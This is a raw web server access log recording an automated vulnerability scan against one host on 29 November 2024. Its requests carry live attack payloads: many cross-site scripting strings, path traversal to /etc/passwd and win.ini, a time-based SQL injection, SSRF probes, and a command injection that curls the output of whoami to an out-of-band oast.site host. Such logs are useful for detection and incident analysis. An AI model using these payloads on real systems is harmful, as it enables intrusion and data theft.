/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS aarch64 15241.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27 HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /find-a-matchpksyk%22%3E%3Cimg%20src=a%20onerror=alert%28document.cookie%29%3Es9a64 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /users/viewi1omd%22%3E%3Cimg%20src=a%20onerror=alert%28document.domain%29%3El43yn/108?tab=activity HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 15229.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - fedish264pro [29/Nov/2024:09:56:54 +0800] "GET /b_download/index.html HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36" 172.18.0.4 - fedish265pro [29/Nov/2024:09:56:54 +0800] "GET /b_download/index.html HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0 maglev/24004.1309.2689.2246/49" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /login.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 Edg/89.0.774.45" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.36" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 403 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4?mode=model HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "POST /mics/services/MICSLogService HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "POST /CFIDE/adminapi/base.cfc?method HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS aarch64 15236.12.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /api/session/properties HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1.1 Safari/605.1.15 AlohaBrowser/4.3.1" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.3 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /login.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /login.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.42" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /custom-report-example/..%5C..%5C..%5Cdeployment%5Csharp%5Cicons%5Chome-app.png HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 5.1; rv:58.0) Gecko/20100101 Firefox/58.0" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/534.34 (KHTML, like Gecko) wkhtmltopdf Safari/534.34" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.2210.157" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /webmail/?mid=3j6p\x22> HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /../../../../etc/passwd HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET /webmail/?color=\x22> HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /resources/qmc/fonts/CVE-2023-41265.ttf HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt&end_dt&locale&index=0 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&locale&hide=0&index=4005&index=0&pickup_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt&end_dt&session_id HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1477.0" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /ad-list-search?keyword&keyword&lat&lat&long&long&location&category HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.domain')%3E/search?category=1 HTTP/1.1" 404 548 "-" "Mozilla/5.0 Windows NT 10.0 Win64 x64 AppleWebKit/537.36 KHTML like Gecko Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22> HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /%5coast.pro/%2f%2e%2e HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /RealGimmWeb/Pages/ErroreNonGestito.aspx HTTP/1.1" 404 146 "-" "" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "POST /modules/miniform/ajax_delete_message.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.69" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /index.php?controller=pjFront&action=pjActionSearch&session_id&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /index.hsp?passwordExpired=yes&username=\x5C'-alert(document.domain),// HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "POST /api/sys/set_passwd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "POST /RealGimmWeb/Pages/Sistema/LogObjectTrace.aspx HTTP/1.1" 404 146 "-" "" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /modules/simpleimportproduct/send.php?phpinfo=1 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /modules/updateproducts/send.php?phpinfo=1 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /index.hsp?passwordExpired=yes&domainName=\x5C'-alert(document.domain),// HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /index.hsp?m=',alert(document.domain),' HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /search/index?q=\x22>ridxm HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.17" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /stores%22%3E%3Cimg+src=a+onerror=alert%28document.domain%29%3Eridxm/all-products?store_id&keyword&price_from&price_to&rating&store_category_id&sortby=most_recent HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "POST /index.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /lwa/Webpages/LwaClient.aspx?meeturl=aHR0cDovL2N0NGh1N2Q2NWpyZGNmY3NnMzQwem8zNW9zN2tpeDNzcS5vYXN0LnNpdGUvP2lkPWVodCUyNXsxMzM3KjEzMzd9Iy54eC8v HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /user_info%22%3E%3Cimg+src=a+onerror=alert%28document.domain%29%3Eridxm/index/friends HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.3.18" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /api/v1/terminal/sessions/ HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /opencms/cmisatom/cmis-online/type?id=1%27\x22> HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0 maglev/24033.804.2695.4008/49" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 405 150 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/604.2.4 (KHTML, like Gecko) Version/9.1.2 Safari/604.2.4" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "POST /opencms/cmisatom/cmis-online/query HTTP/1.1" 404 548 "http://96.9.228.88:888" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:55 +0800] "GET /faqs%22%3E%3Cimg+src=a+onerror=alert%28document.domain%29%3Eridxm/index?content_search=\x22>ridxm HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /users/test%22%3E%3Cimg%20src=a%20onerror=alert(document.domain)%3Etest HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /wp-content/plugins/media-library-assistant/readme.txt HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /classifieds%22%3E%3Cimg+src=a+onerror=alert%28document.domain%29%3Eridxm/search?category=1 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://ct4hu7d65jrdcfcsg340h8tuo3a7ic17q.oast.site/patrowl.svg HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /install/index.php?1692443074&space=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.1108.43 Safari/537.36 Edg/100.0.1108.43" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /lang/log/httpd.log HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/607.1.40 (KHTML, like Gecko) Version/9.1.2 Safari/607.1.40" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "POST /wms HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15 Reeder/5.3.3" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /users/change_emailahrixia%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3eahrixia?step1=1 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /search/index/?q=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.6.21" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071015 SUSE/2.0.0.8-1.1 Firefox/2.0.0.8" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /search?filtered=1&q=test&filter[price]=100-1331\x22>&filter[attr][Memory][]=16+GB HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "POST /geoserver/wms HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.59 Safari/537.36 Edg/92.0.902.23" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /user/login/ HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /roUtGDQl%22%3E%3Cimg%20src=a%20onerror=alert%28document.domain%29%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/610.4.3.1.7 (KHTML, like Gecko) Version/9.1.2 Safari/610.4.3.1.7" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET //roUtGDQl%22%3E%3Cimg%20src=a%20onerror=alert%28document.domain%29%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /search?filter[brandid]=vnxjb\x22>bvu51 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /roUtGDQl%22%3E%3Cimg%20src=a%20onerror=alert%28document.domain%29%3E/..CFIDE/administrator/index.cfm HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "POST /api/sys/login HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "POST /cmisatom/cmis-online/query HTTP/1.1" 404 548 "http://96.9.228.88:888" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+http%3A%2F%2F%24%28whoami%29.ct4hu7d65jrdcfcsg340p1xbxwm8x7own.oast.site HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET / HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "POST /cgi-bin/vitogate.cgi HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36 Edg/100.0.1185.29" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "POST /rpc/clients/xmlrpc HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET /api/v1/cav/client/status/../../admin/options HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.1517.3 Ddg/17.3" 172.18.0.4 - - [29/Nov/2024:09:56:56 +0800] "GET 